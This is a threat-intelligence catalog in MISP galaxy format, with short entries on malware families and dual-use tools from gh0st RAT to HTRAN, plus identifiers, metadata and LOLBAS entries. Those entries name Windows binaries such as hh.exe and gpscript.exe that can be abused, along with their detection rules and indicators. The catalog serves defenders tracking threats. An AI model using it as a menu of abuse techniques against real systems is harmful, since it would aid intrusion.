c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
Resources: * https://www.sothis.tech/author/jgalvez/
Detection: * Sigma: proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml * IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.[GfxDownloadWrapper.exe - LOLBAS Project]
Internal MISP references
UUID a83cfdbf-023a-4874-a3d8-9674149ceb53 which can be used as unique global reference for GfxDownloadWrapper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5186 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
gh0st RAT
gh0st RAT is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[FireEye Hacking Team][Arbor Musical Chairs Feb 2018][Nccgroup Gh0st April 2018]
Internal MISP references
UUID 269ef8f5-35c8-44ba-afe4-63f4c6431427 which can be used as unique global reference for gh0st RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Windows'] |
| software_attack_id | S0032 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GLOOXMAIL
GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic. [Mandiant APT1]
Internal MISP references
UUID 09fdec78-5253-433d-8680-294ba6847be9 which can be used as unique global reference for GLOOXMAIL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0026 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GMER
GMER is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 83713f85-8b2f-4733-9fea-e6a1494d0bbb which can be used as unique global reference for GMER in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5033 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Gold Dragon
Gold Dragon is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 348fdeb5-6a74-4803-ac6e-e0133ecd7263 which can be used as unique global reference for Gold Dragon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0249 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldenSpy
GoldenSpy is a backdoor malware which has been packaged with legitimate tax preparation software. GoldenSpy was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.[Trustwave GoldenSpy June 2020]
Internal MISP references
UUID 1b135393-c799-4698-a880-c6a86782adee which can be used as unique global reference for GoldenSpy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0493 |
| source | MITRE |
| tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
| type | ['malware'] |
GoldFinder
GoldFinder is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. GoldFinder was discovered in early 2021 during an investigation into the SolarWinds Compromise by APT29.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID 4e8c58c5-443e-4f73-91e9-89146f04e307 which can be used as unique global reference for GoldFinder in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0597 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldMax
GoldMax is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. GoldMax was discovered in early 2021 during the investigation into the SolarWinds Compromise, and has likely been used by APT29 since at least mid-2019. GoldMax uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[MSTIC NOBELIUM Mar 2021][FireEye SUNSHUTTLE Mar 2021][CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID b05a9763-4288-4656-bf4e-ba02bb8b35d6 which can be used as unique global reference for GoldMax in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0588 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Goopy
Goopy is a Windows backdoor and Trojan used by APT32 and shares several similarities to another backdoor used by the group (Denis). Goopy is named for its impersonation of the legitimate Google Updater executable.[Cybereason Cobalt Kitty 2017]
Internal MISP references
UUID a75855fd-2b6b-43d8-99a5-2be03b544f34 which can be used as unique global reference for Goopy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0477 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gpscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by group policy to process scripts
Author: Oddvar Moe
Paths: * C:\Windows\System32\gpscript.exe * C:\Windows\SysWOW64\gpscript.exe
Resources: * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Detection: * Sigma: proc_creation_win_lolbin_gpscript.yml * IOC: Scripts added in local group policy * IOC: Execution of Gpscript.exe after logon[Gpscript.exe - LOLBAS Project]
Internal MISP references
UUID acf4a502-2730-4b36-aea3-652420390977 which can be used as unique global reference for Gpscript in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5113 |
| source | Tidal Cyber |
| tags | ['2ca5c5e4-ee7f-4698-84ec-ce04d2c1e9cc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Grandoreiro
Grandoreiro is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. Grandoreiro has confirmed victims in Brazil, Mexico, Portugal, and Spain.[Securelist Brazilian Banking Malware July 2020][ESET Grandoreiro April 2020]
Internal MISP references
UUID 61d277f2-abdc-4f2b-b50a-10d0fe91e588 which can be used as unique global reference for Grandoreiro in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0531 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
GraphicalProton
According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed a HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.[U.S. CISA SVR TeamCity Exploits December 2023]
Internal MISP references
UUID f77398ad-e043-4694-ade0-d6ea16a994e7 which can be used as unique global reference for GraphicalProton in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5077 |
| source | Tidal Cyber |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GravityRAT
GravityRAT is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. [Talos GravityRAT]
Internal MISP references
UUID 08cb425d-7b7a-41dc-a897-9057ce57fea9 which can be used as unique global reference for GravityRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0237 |
| source | MITRE |
| type | ['malware'] |
Green Lambert
Green Lambert is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of Green Lambert may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.[Kaspersky Lamberts Toolkit April 2017][Objective See Green Lambert for OSX Oct 2021]
Internal MISP references
UUID f5691425-6690-4e5e-8304-3ede9d2f5a90 which can be used as unique global reference for Green Lambert in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'macOS', 'Windows', 'iOS'] |
| software_attack_id | S0690 |
| source | MITRE |
| type | ['malware'] |
GreyEnergy
GreyEnergy is a backdoor written in C and compiled in Visual Studio. GreyEnergy shares similarities with the BlackEnergy malware and is thought to be the successor of it.[ESET GreyEnergy Oct 2018]
Internal MISP references
UUID f646e7f9-4d09-46f6-9831-54668fa20483 which can be used as unique global reference for GreyEnergy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0342 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GRIFFON
GRIFFON is a JavaScript backdoor used by FIN7. [SecureList Griffon May 2019]
Internal MISP references
UUID ad358082-d83a-4c22-81a1-6c34dd67af26 which can be used as unique global reference for GRIFFON in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0417 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GrimAgent
GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[Group IB GrimAgent July 2021]
Internal MISP references
UUID c40a71d4-8592-4f82-8af5-18f763e52caf which can be used as unique global reference for GrimAgent in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0632 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Grixba
Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.[Symantec Play Ransomware April 19 2023]
Internal MISP references
UUID 3ff9e020-8a7a-4c6f-a607-117ce9e436c5 which can be used as unique global reference for Grixba in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5079 |
| source | Tidal Cyber |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
gsecdump
gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [TrueSec Gsecdump]
Internal MISP references
UUID 5ffe662f-9da1-4b6f-ad3a-f296383e828c which can be used as unique global reference for gsecdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0008 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
GuLoader
GuLoader is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including NETWIRE, Agent Tesla, NanoCore, FormBook, and Parallax RAT.[Unit 42 NETWIRE April 2020][Medium Eli Salem GuLoader April 2021]
Internal MISP references
UUID 03e985d6-870b-4533-af13-08b1e0511444 which can be used as unique global reference for GuLoader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0561 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
H1N1
H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. [Cisco H1N1 Part 1]
Internal MISP references
UUID 5f1602fe-a4ce-4932-9cf9-ec842f2c58f1 which can be used as unique global reference for H1N1 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0132 |
| source | MITRE |
| type | ['malware'] |
Hacking Team UEFI Rootkit
Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [TrendMicro Hacking Team UEFI]
Internal MISP references
UUID 75db2ac3-901e-4b1f-9a0d-bac6562d57a3 which can be used as unique global reference for Hacking Team UEFI Rootkit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0047 |
| source | MITRE |
| type | ['malware'] |
HALFBAKED
HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks. [FireEye FIN7 April 2017]
Internal MISP references
UUID 5edf0ef7-a960-4500-8a89-8c8b4fdf8824 which can be used as unique global reference for HALFBAKED in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0151 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HAMMERTOSS
HAMMERTOSS is a backdoor that was used by APT29 in 2015. [FireEye APT29] [F-Secure The Dukes]
Internal MISP references
UUID cc07f03f-9919-4856-9b30-f4d88940b0ec which can be used as unique global reference for HAMMERTOSS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0037 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hancitor
Hancitor is a downloader that has been used by Pony and other information stealing malware.[Threatpost Hancitor][FireEye Hancitor]
Internal MISP references
UUID 4eee3272-07fa-48ee-a7b9-9dfee3e4550a which can be used as unique global reference for Hancitor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0499 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
HAPPYWORK
HAPPYWORK is a downloader used by APT37 to target South Korean government and financial victims in November 2016. [FireEye APT37 Feb 2018]
Internal MISP references
UUID c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8 which can be used as unique global reference for HAPPYWORK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0214 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HARDRAIN
HARDRAIN is a Trojan malware variant reportedly used by the North Korean government. [US-CERT HARDRAIN March 2018]
Internal MISP references
UUID ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7 which can be used as unique global reference for HARDRAIN in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0246 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Havij
Havij is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [Check Point Havij Analysis]
Internal MISP references
UUID 8bd36306-bd4b-4a76-8842-44acb0cedbcc which can be used as unique global reference for Havij in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0224 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
HAWKBALL
HAWKBALL is a backdoor that was observed in targeting of the government sector in Central Asia.[FireEye HAWKBALL Jun 2019]
Internal MISP references
UUID 392c5a32-53b5-4ce8-a946-226cb533cc4e which can be used as unique global reference for HAWKBALL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0391 |
| source | MITRE |
| type | ['malware'] |
hcdLoader
hcdLoader is a remote access tool (RAT) that has been used by APT18. [Dell Lateral Movement]
Internal MISP references
UUID a7ffe1bd-45ca-4ca4-94da-3b6c583a868d which can be used as unique global reference for hcdLoader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0071 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HDoor
HDoor is malware that has been customized and used by the Naikon group. [Baumgartner Naikon 2015]
Internal MISP references
UUID f155b6f9-258d-4446-8867-fe5ee26d8c72 which can be used as unique global reference for HDoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0061 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HELLOKITTY
HELLOKITTY is a ransomware written in C++ that shares similar code structure and functionality with DEATHRANSOM and FIVEHANDS. HELLOKITTY has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.[FireEye FiveHands April 2021]
Internal MISP references
UUID 813a4ca1-84fe-42dc-89de-5873d028f98d which can be used as unique global reference for HELLOKITTY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0617 |
| source | MITRE |
| tags | ['4ac8dcde-2665-4066-9ad9-b5572d5f0d28', '3535caad-a155-4996-b986-70bc3cd5ce1e', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Helminth
Helminth is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. [Palo Alto OilRig May 2016]
Internal MISP references
UUID d6560c81-1e7e-4d01-9814-4be4fb43e655 which can be used as unique global reference for Helminth in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0170 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HermeticWiper
HermeticWiper is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[SentinelOne Hermetic Wiper February 2022][Symantec Ukraine Wipers February 2022][Crowdstrike DriveSlayer February 2022][ESET Hermetic Wiper February 2022][Qualys Hermetic Wiper March 2022]
Internal MISP references
UUID f0456f14-4913-4861-b4ad-5e7f3960040e which can be used as unique global reference for HermeticWiper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0697 |
| source | MITRE |
| tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
HermeticWizard
HermeticWizard is a worm that has been used to spread HermeticWiper in attacks against organizations in Ukraine since at least 2022.[ESET Hermetic Wizard March 2022]
Internal MISP references
UUID 36ddc8cd-8f80-489e-a702-c682936b5393 which can be used as unique global reference for HermeticWizard in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0698 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Heyoka Backdoor
Heyoka Backdoor is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by Aoqin Dragon since at least 2013.[SentinelOne Aoqin Dragon June 2022][Sourceforge Heyoka 2022]
Internal MISP references
UUID 1841a6e8-6c23-46a1-9c81-783746083764 which can be used as unique global reference for Heyoka Backdoor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1027 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for processing chm files in Windows
Author: Oddvar Moe
Paths: * C:\Windows\hh.exe * C:\Windows\SysWOW64\hh.exe
Resources: * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Detection: * Sigma: proc_creation_win_hh_chm_execution.yml * Sigma: proc_creation_win_hh_html_help_susp_child_process.yml * Elastic: execution_via_compiled_html_file.toml * Elastic: execution_html_help_executable_program_connecting_to_the_internet.toml * Splunk: detect_html_help_spawn_child_process.yml * Splunk: detect_html_help_url_in_command_line.yml[Hh.exe - LOLBAS Project]
Internal MISP references
UUID 5a0d0b83-5a10-425c-98f7-6cb8eb76fda4 which can be used as unique global reference for Hh in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5114 |
| source | Tidal Cyber |
| tags | ['7d028d1e-7a95-47f0-9367-55517f9ef170', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
HiddenWasp
HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.[Intezer HiddenWasp Map 2019]
Internal MISP references
UUID ec02fb9c-bf9f-404d-bc54-819f2b3fb040 which can be used as unique global reference for HiddenWasp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0394 |
| source | MITRE |
| type | ['malware'] |
HIDEDRV
HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware. [ESET Sednit Part 3] [Sekoia HideDRV Oct 2016]
Internal MISP references
UUID ce1af464-0b14-4fe9-8591-a6fe58aa96c7 which can be used as unique global reference for HIDEDRV in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0135 |
| source | MITRE |
| tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hikit
Hikit is malware that has been used by Axiom for late-stage persistence and exfiltration after the initial compromise.[Novetta-Axiom][FireEye Hikit Rootkit]
Internal MISP references
UUID 8046c80c-4339-4cfb-8bfd-464801db2bfe which can be used as unique global reference for Hikit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0009 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hildegard
Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard. [Unit 42 Hildegard Malware]
Internal MISP references
UUID 7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c which can be used as unique global reference for Hildegard in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Containers', 'Linux', 'IaaS'] |
| software_attack_id | S0601 |
| source | MITRE |
| tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hi-Zor
Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION. [Fidelis Hi-Zor]
Internal MISP references
UUID 286184d9-f28a-4d5a-a9dd-2216b3c47809 which can be used as unique global reference for Hi-Zor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0087 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
HOMEFRY
HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other Leviathan backdoors. [FireEye Periscope March 2018]
Internal MISP references
UUID 16db13f2-f350-4323-96cb-c5f4ac36c3e0 which can be used as unique global reference for HOMEFRY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0232 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HOPLIGHT
HOPLIGHT is a backdoor Trojan that has reportedly been used by the North Korean government.[US-CERT HOPLIGHT Apr 2019]
Internal MISP references
UUID 4d94594c-2224-46ca-8bc3-28b12ed139f9 which can be used as unique global reference for HOPLIGHT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0376 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HotCroissant
HotCroissant is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.[US-CERT HOTCROISSANT February 2020] HotCroissant shares numerous code similarities with Rifdoor.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe which can be used as unique global reference for HotCroissant in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0431 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HTRAN
HTRAN is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. [Operation Quantum Entanglement][NCSC Joint Report Public Tools]
